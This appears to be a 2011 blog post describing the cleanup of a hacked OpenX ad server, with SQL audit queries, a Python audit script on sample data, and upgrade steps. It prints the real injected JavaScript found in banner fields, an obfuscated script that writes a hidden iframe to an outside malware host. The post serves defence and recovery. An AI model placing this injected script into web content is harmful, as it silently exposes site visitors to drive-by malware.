Openx Server hacked and infected with malicious shit

May 2nd, 2011 | Category: Internet

So I received a notice from Google alerting me that one of my websites was infected with malicious code. At first I thought it was a mistake on their part because of the sneaky way I serve my ads, but when the second notice came in for another domain I looked a little closer into the issue and found that I had in fact been compromised. Well, OpenX in particular had been compromised 🙁 So the fun task began of cleaning this shit out of my advertising server so that all of my sites wouldn’t be messed up, and below are the instructions for what I did:

Part of these instructions I found here, and a big thanks goes out to the author for putting them up.

The first thing to do was to check for any malicious code being inserted into my banners via the append or prepend fields. Just go into mysql and type this:

SELECT bannerid, append, prepend FROM ox_banners WHERE append != '' OR prepend != '';


Resulted in this:

<script language="javascript">
var dc=document; var date_ob=new Date(); date_ob.setTime(date_ob.getTime()+86400000);if(dc.cookie.indexOf('Z=a2') <= 0 && dc.cookie.indexOf('Z=a0') > 0){
function clng(wrd){var cou=new Array('en-us','en-ca','en-au','en-gb','fr-ca','fr','de','es','it','ru','ru-ru');for(i=0;i<cou.length;i++){if(wrd==cou[i])return true;}return false;}
if(typeof navigator.language == 'undefined'){var nav = navigator.userLanguage} else {var nav = navigator.language;}
if(typeof run == 'undefined'&&clng(nav.toLowerCase())){dc.writeln("<script type=\"text/javascript\"><!--");dc.writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='http://setairok.com/building/fast ';");dc.writeln("document.write('<ifr'+'ame'+host+src+sc+brdr+'></ifra'+'me>');");dc.writeln("//--><\/script>");
dc.cookie='sZ=a2; path=/; expires='+date_ob.toGMTString();}} dc.cookie='zZ=a0; path=/;';var run=1;
</script>

being repeated a bunch of times, one for every banner in fact. So it looked like I was in fact infected and it was time to clean this garbage out. The next step was to go into phpMyAdmin and edit each banner entry, removing this malicious code entirely.

After this I checked to make sure that no extra admin accounts had been created (luckily there weren’t any) by typing this into mysql:

SELECT u.user_id, u.contact_name, u.email_address, u.username FROM ox_users AS u, ox_account_user_assoc AS aua WHERE u.user_id=aua.user_id AND aua.account_id = (SELECT value FROM ox_application_variable WHERE name='admin_account_id');


Finally, as a precaution based on some of the other threads I found, I searched the database for all instances of the word IFRAME, since that is what this hack injects, and everything came up clean.
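The four checks above (non-empty append/prepend wrappers, blanking them, listing the users attached to the admin account, and searching for injected IFRAMEs) as one offline audit script. This is an added example, not code from the post or from OpenX: it uses Python’s sqlite3 with a small constructed stand-in for the ox_banners, ox_users, ox_account_user_assoc and ox_application_variable tables (the real install is MySQL, and the htmltemplate column and every sample row are assumptions). It also shows a caveat worth knowing: the injected script builds its tag as '<ifr'+'ame', so a literal search for IFRAME misses the append/prepend payload, and a second pattern that tolerates the split is needed to catch it.

```python
import re
import sqlite3

# Constructed sample payload: the shape of the injected append/prepend script,
# with the tag split as '<ifr'+'ame' exactly as in the real banner injection.
INJECTED = ("<script language=\"javascript\">var dc=document;"
            "dc.writeln(\"document.write('<ifr'+'ame'+host+src+sc+brdr+'></ifra'+'me>');\");"
            "</script>")

# Assumed minimal schema for the four OpenX tables the audit queries touch.
SCHEMA = """
CREATE TABLE ox_banners (bannerid INTEGER PRIMARY KEY,
                         append TEXT NOT NULL DEFAULT '',
                         prepend TEXT NOT NULL DEFAULT '',
                         htmltemplate TEXT NOT NULL DEFAULT '');
CREATE TABLE ox_users (user_id INTEGER PRIMARY KEY, contact_name TEXT,
                       email_address TEXT, username TEXT);
CREATE TABLE ox_account_user_assoc (account_id INTEGER, user_id INTEGER);
CREATE TABLE ox_application_variable (name TEXT, value TEXT);
"""

def build_sample_db():
    """Constructed in-memory database: two tampered banners, one rogue admin user."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO ox_banners VALUES (?, ?, ?, ?)", [
        (1, "", "", "<a href='http://example.com/'>ad</a>"),          # clean banner
        (2, INJECTED, "", ""),                                        # tampered append
        (3, "", INJECTED, ""),                                        # tampered prepend
        (4, "", "", "<IFRAME src='http://example.net/x'></IFRAME>"),  # literal iframe
    ])
    conn.executemany("INSERT INTO ox_users VALUES (?, ?, ?, ?)", [
        (1, "Site Owner", "owner@example.com", "owner"),
        (2, "Unknown", "x@example.org", "support2"),   # account the owner never created
        (3, "Advertiser", "adv@example.com", "adv"),
    ])
    conn.executemany("INSERT INTO ox_account_user_assoc VALUES (?, ?)",
                     [(1, 1), (1, 2), (7, 3)])
    conn.execute("INSERT INTO ox_application_variable VALUES ('admin_account_id', '1')")
    conn.commit()
    return conn

def tampered_banners(conn):
    """Step 1: banners whose append/prepend wrappers are not empty (the post's first query)."""
    rows = conn.execute("SELECT bannerid FROM ox_banners "
                        "WHERE append != '' OR prepend != '' ORDER BY bannerid").fetchall()
    return [r[0] for r in rows]

def clean_wrappers(conn, bannerids):
    """Step 2: blank the wrappers (the phpMyAdmin edit done in SQL); returns rows changed."""
    cur = conn.executemany("UPDATE ox_banners SET append = '', prepend = '' WHERE bannerid = ?",
                           [(b,) for b in bannerids])
    conn.commit()
    return cur.rowcount

def admin_users(conn):
    """Step 3: every user attached to the admin account (the post's second query).
    admin_account_id is stored as text, so it is cast before the comparison."""
    rows = conn.execute(
        "SELECT u.username FROM ox_users AS u, ox_account_user_assoc AS aua "
        "WHERE u.user_id = aua.user_id AND aua.account_id = "
        "(SELECT CAST(value AS INTEGER) FROM ox_application_variable "
        " WHERE name = 'admin_account_id') ORDER BY u.username").fetchall()
    return [r[0] for r in rows]

def unexpected_admins(conn, expected):
    """Admin users that are not in the list the owner knows about."""
    return sorted(set(admin_users(conn)) - set(expected))

LITERAL_IFRAME = re.compile(r"<iframe", re.IGNORECASE)
# The injection writes '<ifr'+'ame', so allow quotes, plus signs and whitespace
# between the two fragments; a literal search would miss it.
SPLIT_IFRAME = re.compile(r"ifr['\"+\s]*ame", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<script", re.IGNORECASE)

def search_banners(conn, pattern):
    """Step 4: scan every text field of every banner for a compiled pattern."""
    hits = []
    for bannerid, *fields in conn.execute(
            "SELECT bannerid, append, prepend, htmltemplate FROM ox_banners ORDER BY bannerid"):
        if any(pattern.search(f) for f in fields):
            hits.append(bannerid)
    return hits

if __name__ == "__main__":
    db = build_sample_db()
    bad = tampered_banners(db)
    print("banners with non-empty append/prepend:", bad)
    print("literal <iframe> hits:", search_banners(db, LITERAL_IFRAME))
    print("split-string iframe hits:", search_banners(db, SPLIT_IFRAME))
    print("users on the admin account:", admin_users(db))
    print("unexpected admins:", unexpected_admins(db, {"owner"}))
    print("cleaned", clean_wrappers(db, bad), "banners; remaining:", tampered_banners(db))
```

On the sample data the literal pattern only finds banner 4, while the split-tolerant pattern and the plain `<script` check both flag banners 2 and 3, which is why a clean IFRAME search on its own should not be taken as proof that the wrappers are clean. Against a real install, point the queries at the MySQL database and keep the owner’s known admin usernames in the `expected` set.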

At this point I am fairly confident the bad shit has been cleaned out, so the last step is to completely upgrade OpenX as per the instructions here: http://www.openx.org/pt/docs/upgrading-openx

I think that should do it, so time to go into Google Webmaster Tools and request a scan of the site to confirm everything has been cleaned out.
